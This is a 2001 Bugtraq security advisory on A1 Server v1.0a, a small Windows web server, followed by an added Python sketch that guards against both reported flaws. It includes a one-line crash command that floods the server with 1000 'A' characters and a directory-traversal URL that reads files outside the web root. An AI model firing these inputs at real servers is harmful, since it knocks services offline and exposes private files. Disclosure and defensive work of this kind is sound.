Bugtraq mailing list archives

A1 Server v1.0a HTTPd (DoS & Dir Traversal)


From: slipy () B10Z NET
Date: Tue, 27 Feb 2001 04:53:54 -0000

Introduction:

A1 Server v1.0a is an HTTPd server for the Windows 
OS, and it will deliver the following content: GIF 
images, HTM or HTML pages, EXE files, and ZIP 
files. The server is very small, yet somewhat 
stable, and is freeware! (Yeah, right.)


The vendor's website is:
http://msnhomepages.talkcity.com/windowsway/lriver2/a1server.htm


Problem #1 : Denial of Service Attack

A1 Server v1.0a is vulnerable to a nasty Denial of 
Service attack where it can be flooded with useless 
junk until the server crashes promptly. Once it has 
crashed, it needs to be restarted for it to 
work properly. All Windows versions appear to be 
affected. 

Example:

echo `perl -e 'print "A" x 1000'` | telnet a1server 80 

^^ = Will cause the program to quit within seconds 
and display:

A1SERVER caused an invalid page fault in module 
A1SERVER.EXE at 016f:004101ae. 
Registers:
EAX=00000000 CS=016f EIP=004101ae EFLGS=00010246
EBX=00420094 SS=0177 ESP=006bfc70 EBP=006bfc78
ECX=ffffffff DS=0177 ESI=00000001 FS=6417
EDX=004263b2 ES=0177 EDI=00000001 GS=5e47
Bytes at CS:EIP:
f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc 
Stack dump:
004211a8 0000001c 006bfca8 004151db 004211a8 
00000001 006bfcb0 00008d20 006bfcfc bff7b796 
bffc9490 00000177 006bfcb8 bff7b828 006bfcc8 
bff7363b 

Problem #2 : Directory Traversal

Adding the string "/../" to a URL allows an attacker to 
view any file on the server, provided the attacker 
knows where the file is located in the first place. 

Example:

http://www.a1server.win/../../../../../../Scandisk.log 

^^ = Will obviously open the Scandisk.log file.


Vendor has been notified. No e-mail reply yet.

--------------------
b10z HTTPd Advisory
slipy () b10z net

Found: February 26th, 2001.
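
A defensive sketch covering both problems reported above, added here as an example; it is not code from the advisory or from the A1 Server vendor. The function name `resolve_request`, the 512-byte request-line limit and the status codes returned are assumptions, and the sample requests are constructed.

```python
from pathlib import Path
from urllib.parse import unquote

MAX_REQUEST_LINE = 512  # assumed limit; the advisory does not state one
# Content types the advisory says the server delivers.
ALLOWED_EXT = {".gif", ".htm", ".html", ".exe", ".zip"}


def resolve_request(request_line: bytes, docroot: Path):
    """Return (status, path); path is set only when status == 200."""
    # Problem #1 input class: reject oversized or malformed request lines
    # before any code that assumes a well-formed "METHOD target version".
    if len(request_line) > MAX_REQUEST_LINE:
        return 414, None
    try:
        method, target, version = request_line.decode("ascii").split()
    except ValueError:  # wrong token count, or non-ASCII bytes
        return 400, None
    if method != "GET" or not version.startswith("HTTP/") or not target.startswith("/"):
        return 400, None

    # Problem #2: decode once, treat backslashes as separators (Windows),
    # then refuse any ".." segment rather than trying to clean it up.
    url_path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    if "\x00" in url_path or ".." in url_path.split("/"):
        return 403, None

    # Defence in depth: the resolved file must still sit under docroot.
    root = docroot.resolve()
    candidate = (root / url_path.lstrip("/")).resolve()
    if root != candidate and root not in candidate.parents:
        return 403, None
    if candidate.suffix.lower() not in ALLOWED_EXT:
        return 403, None
    return 200, candidate


if __name__ == "__main__":
    # Constructed sample requests mirroring the two examples in the advisory.
    samples = [
        b"A" * 1000,
        b"GET /../../../../../../Scandisk.log HTTP/1.0",
        b"GET /index.htm HTTP/1.0",
    ]
    for line in samples:
        print(line[:40], "->", resolve_request(line, Path("wwwroot"))[0])
```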

